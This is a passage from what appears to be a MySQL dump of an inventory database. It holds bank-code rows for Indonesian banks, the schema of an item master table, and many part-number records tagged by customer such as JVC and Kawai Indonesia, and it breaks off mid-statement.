INSERT INTO mst_bank VALUES ('121', 'Bank Lampung'); INSERT INTO mst_bank VALUES ('122', 'Bank Kalsel'); INSERT INTO mst_bank VALUES ('124', 'Bank BPD Kaltim'); INSERT INTO mst_bank VALUES ('126', 'Bank Sulsel'); INSERT INTO mst_bank VALUES ('127', 'Bank Sulut'); INSERT INTO mst_bank VALUES ('128', 'Bank BPD NTB'); INSERT INTO mst_bank VALUES ('129', 'Bank BPD Bali'); INSERT INTO mst_bank VALUES ('130', 'Bank NTT'); INSERT INTO mst_bank VALUES ('131', 'Bank Maluku'); INSERT INTO mst_bank VALUES ('132', 'Bank Papua'); INSERT INTO mst_bank VALUES ('133', 'Bank Bengkulu'); INSERT INTO mst_bank VALUES ('135', 'Bank Sultra'); INSERT INTO mst_bank VALUES ('145', 'Bank Nusantara Parah'); INSERT INTO mst_bank VALUES ('147', 'Bank Muamalat'); INSERT INTO mst_bank VALUES ('151', 'Bank Mestika'); INSERT INTO mst_bank VALUES ('212', 'Bank Saudara'); INSERT INTO mst_bank VALUES ('426', 'Bank Mega'); INSERT INTO mst_bank VALUES ('441', 'Bank Bukopin'); INSERT INTO mst_bank VALUES ('451', 'Bank Syariah Mandiri'); INSERT INTO mst_bank VALUES ('485', 'Bank Bumiputera'); INSERT INTO mst_bank VALUES ('494', 'Bank Agroniaga'); INSERT INTO mst_bank VALUES ('506', 'Bank Syariah Mega In'); INSERT INTO mst_bank VALUES ('513', 'Bank Ina Perdana'); INSERT INTO mst_bank VALUES ('558', 'Bank Eksekutif'); INSERT INTO mst_bank VALUES ('950', 'Bank Commonwealth'); -- ---------------------------- -- Table structure for `mst_barang` -- ---------------------------- DROP TABLE IF EXISTS `mst_barang`; CREATE TABLE `mst_barang` ( `KdBarang` varchar(8) NOT NULL DEFAULT '', `TpBarang` tinyint(2) DEFAULT NULL, `MatGroup` varchar(4) DEFAULT NULL, `PartNo` varchar(100) DEFAULT NULL, `NmBarang` varchar(25) DEFAULT NULL, `HsNo` varchar(12) DEFAULT NULL, `DieNo` varchar(30) DEFAULT NULL, `UWm` decimal(10,4) DEFAULT NULL, `LPc` decimal(10,4) DEFAULT NULL, `WPcs` decimal(10,4) DEFAULT NULL, `LBar` decimal(10,0) DEFAULT NULL, `PcBar` decimal(10,0) DEFAULT NULL, `WBar` decimal(10,4) DEFAULT NULL, `Finish` varchar(10) DEFAULT NULL, `twhmp` varchar(25) DEFAULT NULL, `Sat` varchar(3) DEFAULT NULL, `Harga` decimal(12,2) DEFAULT NULL, `Treatment` varchar(15) DEFAULT NULL COMMENT 'Support Treatment', `Ket` varchar(100) DEFAULT NULL, `cust` varchar(50) DEFAULT NULL COMMENT 'Nama Customer', PRIMARY KEY (`KdBarang`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_barang -- ---------------------------- INSERT INTO mst_barang VALUES ('FAB-0001', '0', '', 'VF2A00189400', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'ALL BRILIANT'); INSERT INTO mst_barang VALUES ('FGE-0001', '0', '', '101-08-178-80/500SERIES', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0002', '0', '', '501-08-117-90', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0003', '0', '', '501-08-127-40A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0004', '0', '', '501-08-130-20A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0005', '0', '', '501-08-131-30', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0006', '0', '', '501-08-164-80', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0007', '0', '', '501-08-150-20', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0008', '0', '', '501-08-151-30', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0009', '0', '', '501-08-152-60', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0010', '0', '', '501-08-154-80', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FGE-0011', '0', '', '501-08-155-70', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA'); INSERT INTO mst_barang VALUES ('FIM-0001', '0', '', '446S267010 ( Fin only )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'IWAI METAL'); INSERT INTO mst_barang VALUES ('FJI-0001', '0', '', 'FSMH3001-201', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0002', '0', '', 'GE30938-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0003', '0', '', 'GE31894-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0004', '0', '', 'GE32360-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0005', '0', '', 'GE32823-004A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0006', '0', '', 'GE32823-007A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0007', '0', '', 'GE32823-009A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0008', '0', '', 'GE32823-010A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0009', '0', '', 'GE32927-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0010', '0', '', 'GE32927-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0011', '0', '', 'GE33234-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0012', '0', '', 'GE33234-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0013', '0', '', 'GE33323-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0014', '0', '', 'GE33323-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0015', '0', '', 'GE33544-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0016', '0', '', 'GE33962-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0017', '0', '', 'GE33962-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0018', '0', '', 'GE34070-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0019', '0', '', 'GE34070-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0020', '0', '', 'GE34070-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0021', '0', '', 'GE34070-004A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0022', '0', '', 'GE34810-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0023', '0', '', 'GE40107-002A t=1.5', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0024', '0', '', 'GE40124-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0025', '0', '', 'GE40172-005A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0026', '0', '', 'GE40395-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0027', '0', '', 'GE40395-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0028', '0', '', 'GE40395-005A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0029', '0', '', 'GE40395-006A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0030', '0', '', 'GE40499-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0031', '0', '', 'GE40499-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0032', '0', '', 'GE40642-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0033', '0', '', 'LV20916-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0034', '0', '', 'LV20916-004A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0035', '0', '', 'LV34061-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0036', '0', '', 'LV34655-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0037', '0', '', 'LV34655-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0038', '0', '', 'LV35331-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0039', '0', '', 'LV37016-201A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0040', '0', '', 'LV37858-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0041', '0', '', 'LV37859-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0042', '0', '', 'LV37875-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0043', '0', '', 'LV37896-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0044', '0', '', 'LV37970-01A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0045', '0', '', 'LV38527-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0046', '0', '', 'LV38882-001MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0047', '0', '', 'LV38882-003BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0048', '0', '', 'LV38883-001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0049', '0', '', 'LV39078-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0050', '0', '', 'LV39126-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0051', '0', '', 'LV39126-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0052', '0', '', 'LV39538-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0053', '0', '', 'LV39607-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0054', '0', '', 'LV42152-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0055', '0', '', 'LV43349-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0056', '0', '', 'LV43967-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0057', '0', '', 'LV43968-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0058', '0', '', 'LV44335-001ABA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0059', '0', '', 'VKL 7059', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0060', '0', '', 'LV44972-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0061', '0', '', 'GE40642-001A-PP', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FJI-0062', '0', '', 'LV20916-003A-NK', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('FKI-0001', '0', '', 'APFB-0003', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0002', '0', '', 'KLFB-0014', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0003', '0', '', 'KLFB-0017', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0004', '0', '', 'KMFB-0170', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0005', '0', '', 'KMFB-0210', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0006', '0', '', 'KMFB-0217', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0007', '0', '', 'KPFB-0260 Rev : 100', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0008', '0', '', 'KPFB-0260 Rev : 102', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0009', '0', '', 'KPFB-0318', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0010', '0', '', 'KPFB-0457', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0011', '0', '', 'KPFB-0547', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0012', '0', '', 'KPFB-0568/KPFB-0378BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0013', '0', '', 'KPFB-0568/KPFB-0378MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0014', '0', '', 'KPFB-1070', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0015', '0', '', 'KPFB-0590 Rev101L=150 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0016', '0', '', 'KPFB-0590 Rev102L=120 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0017', '0', '', 'KPFB-0590 Rev102L=90 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0018', '0', '', 'KPFB-0590 Rev102L=60 WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0019', '0', '', 'KPFB-0612', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0020', '0', '', 'KPFB-0799', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0021', '0', '', 'KPFB-0801', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0022', '0', '', 'KPFB-0850', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0023', '0', '', 'KPFB-0851', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0024', '0', '', 'KPFB-0960', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0025', '0', '', 'KPFB-0961', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0026', '0', '', 'KPFB-1030', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0027', '0', '', 'KPFB-1046', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0028', '0', '', 'KPFB1073', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0029', '0', '', 'KPFB1075', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKI-0030', '0', '', 'KPFB1070', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KAWAI INDONESIA'); INSERT INTO mst_barang VALUES ('FKS-0001', '0', '', '5010-102-231-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'Kasen'); INSERT INTO mst_barang VALUES ('FKS-0002', '0', '', '5010-102-233-11', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'Kasen'); INSERT INTO mst_barang VALUES ('FKS-0003', '0', '', '5010-312-430-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'Kasen'); INSERT INTO mst_barang VALUES ('FKS-0004', '0', '', '5010-312-381-11', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'Kasen'); INSERT INTO mst_barang VALUES ('FKS-0005', '0', '', '5010-404-227-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'Kasen'); INSERT INTO mst_barang VALUES ('FKT-0001', '0', '', 'APFB-0003', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0002', '0', '', 'KLFB-0014', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0003', '0', '', 'KPFB-0260 REV 102', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0004', '0', '', 'KPFB-0547 L=90 mm', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0005', '0', '', 'KPFB-0590 Rev102 L= 60 mm (White Anodize)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0006', '0', '', 'KPFB-0590 Rev102 L= 90 mm (White Anodize)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0007', '0', '', 'KPFB-0590 Rev102 L= 120 mm (White anodize)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0008', '0', '', 'KPFB-0612', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0009', '0', '', 'KPFB-1073', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0010', '0', '', 'KPFB-1075', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0011', '0', '', 'KPFB-0960', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FKT-0012', '0', '', 'KPFB-0961', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'KATOLEC INDONESIA'); INSERT INTO mst_barang VALUES ('FLT-0001', '0', '', 'AT-0606-02-00(L=296)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0002', '0', '', 'AT-0606-02-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0003', '0', '', 'AT-0606-02-00(L=596)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0004', '0', '', 'AT-0606-11-00(L=296)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0005', '0', '', 'AT-0606-11-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0006', '0', '', 'AT-0606-11-00(L=596)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0007', '0', '', 'AT-0607-02-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0008', '0', '', 'AT-0607-02-00(L=896)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0009', '0', '', 'AT-0607-02-00(L=1196)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0010', '0', '', 'AT-0607-05-00(L=418)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0011', '0', '', 'AT-0607-06-00(L=391)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0012', '0', '', 'AT-0607-15-00(L=446)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0013', '0', '', 'AT-0607-15-00(L=896)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FLT-0014', '0', '', 'AT-0607-15-00(L=1196)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'LIMA TEKNO'); INSERT INTO mst_barang VALUES ('FMP-0001', '0', '', '3F-070015', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'MATSUZAWA'); INSERT INTO mst_barang VALUES ('FMP-0002', '0', '', '3F-070016', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'MATSUZAWA'); INSERT INTO mst_barang VALUES ('FPB-0001', '0', '', '3F-00000S1', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0002', '0', '', '3F-00000S2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0003', '0', '', '3F09291400A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0004', '0', '', '3F-01628300AO-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0005', '0', '', '3A10028200A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0006', '0', '', '3A10028900A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0007', '0', '', '3A10029300A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0008', '0', '', '3F-06905200A1-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0009', '0', '', '3F-06905300A1-001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0010', '0', '', '3F-06905500A1-002', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0011', '0', '', '3F-06905700A1-003', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0012', '0', '', '3F-06971800AO-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0013', '0', '', '3A10030100A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0014', '0', '', '3F-06971800AO-002', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0015', '0', '', '3F-07001400AO-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0016', '0', '', '3F-070015 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0017', '0', '', '3F-07001500A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0018', '0', '', '3F-07001500B0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0019', '0', '', 